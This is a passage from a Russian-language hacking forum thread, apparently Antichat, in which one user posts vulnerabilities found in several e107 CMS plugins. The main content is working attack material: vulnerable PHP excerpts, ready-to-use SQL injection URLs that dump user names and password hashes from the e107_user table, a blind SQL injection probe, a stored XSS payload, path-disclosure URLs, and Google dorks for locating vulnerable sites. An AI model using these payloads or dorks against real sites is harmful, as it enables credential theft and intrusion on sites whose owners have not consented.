    http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_category_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_archive_menu.php
    http://e107/e107_plugins/aacgc_pnews/e_latest.php
    http://e107/e107_plugins/aacgc_pnews/counter.php
    etc...

    Дорк:inurl:e107_plugins/aacgc_pnews/
     
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Donation Listing V1.7

    Необходимы права администратора, SQL Injection:
    /admin_edit_donator.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $id $tmp[1];
            unset(
    $tmp);
    }
    ...
    if (
    $action == "edit")
    {
            
    $sql->db_Select("donation_listing""*""WHERE don_id= $id","");
            
    $row $sql->db_Fetch();
    ...
    Пример:
    Code:
    http://e107/e107_plugins/donation_listing/admin_edit_donator.php?edit.-1%20union%20select%201,2,database(),4,5,6
    
    Необходимы права администратора, SQL Injection:
    /admin_edit_month.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    if (
    $action == "edit")
    {
                    
    $sql->db_Select("donation_listing_month""month_id, month_name, year""month_id = $id");
                    
    $row $sql->db_Fetch();

    $sql2 = new db;
    $sql2->db_Select("donation_listing_year""*");
    $rows $sql2->db_Rows();
    for (
    $i=0$i $rows$i++) {
    $option $sql2->db_Fetch();
    $options .= "<option name='year' value='".$option['year_id']."'>".$option['year_name']."</option>";}
    ...
    Пример:
    Code:
    http://e107/e107_plugins/donation_listing/admin_edit_month.php?edit.-1%20union%20select%201,database(),3
    
    Путь:
    http://e107/e107_plugins/donation_listing/Current_Donations_menu.php
    http://e107/e107_plugins/donation_listing/Latest_Donations_menu.php
    http://e107/e107_plugins/donation_listing/admin_menu.php

    Баги никому не нужные, но всё же..
     
    2 people like this.
  17. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Election v0.5

    SQL Injection:
    /election.php (election_class.php)
    PHP:
    ...
    $candidatelist $dao->getCandidateList($election->getId());
    ...
          if (
    $sql->db_Select("user""user_id, user_name, user_login")) {
             while (
    $row $sql->db_Fetch()) {
                
    $owners[] = array($row["user_id"], $row["user_name"]." (".$row["user_login"].")");
             }
    ...
    Пример:
    Code:
    http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/election/admin_menu.php
    http://e107/e107_plugins/election/e_comment.php
    http://e107/e107_plugins/election/e_search.php

    Дорк:inurl:e107_plugins/election/
     
    1 person likes this.
  18. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    RSS Reader v1.10

    Blind SQL Injection:
    /include/getrss.php
    PHP:
    ...
    $q=$_GET["q"];
    ...
            
    $sql->DB_Select("rss_reader","rss_feed_addr","rss_feed_id=".$q);
    ...
    Пример:
    Code:
    http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5
    
    Путь:
    http://e107/e107_plugins/rss_reader/admin_menu.php

    Дорк:inurl:e107_plugins/rss_reader/
     
    1 person likes this.
  19. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Yellow Pages v2.0 b1

    SQL Injection:
    /yellowpages.php
    Пример:
    Code:
    http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/yellowpages/admin_menu.php
    http://e107/e107_plugins/yellowpages/admin_prefs_90.php
    http://e107/e107_plugins/yellowpages/admin_update.php
    http://e107/e107_plugins/yellowpages/e_list.php
    http://e107/e107_plugins/yellowpages/e_search.php
    etc..

    Дорк:inurl:e107_plugins/yellowpages/
     
  20. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Tutor Locator v1.1

    XSS:
    /tutor.php
    PHP:
    {
        
    $pid = (IsSet($_POST['pid']) ? $_POST['pid'] : 0);
        
    $tmp explode("."e_QUERY);
        
    $tutor_from intval($tmp[0]);
        
    $tutor_action "item";
        
    $tutor_itemid intval($tmp[4]);
        
    $tutor_com->enter_comment($_POST['author_name'], $_POST['comment'], "tutor"$tutor_itemid$pid$_POST['subject']);
        
    // print $tutor_action.$tutor_itemid;
    }
    Снизу есть форма отправки комментария, вписываем "<script>alert('xss')</script>" и.. любуемся.


    Путь:
    http://e107/e107_plugins/tutor/tutor_top_menu.php

    Дорк:inurl:e107_plugins/tutor/
     
    #80 Фараон, 14 Dec 2010
    Last edited: 14 Dec 2010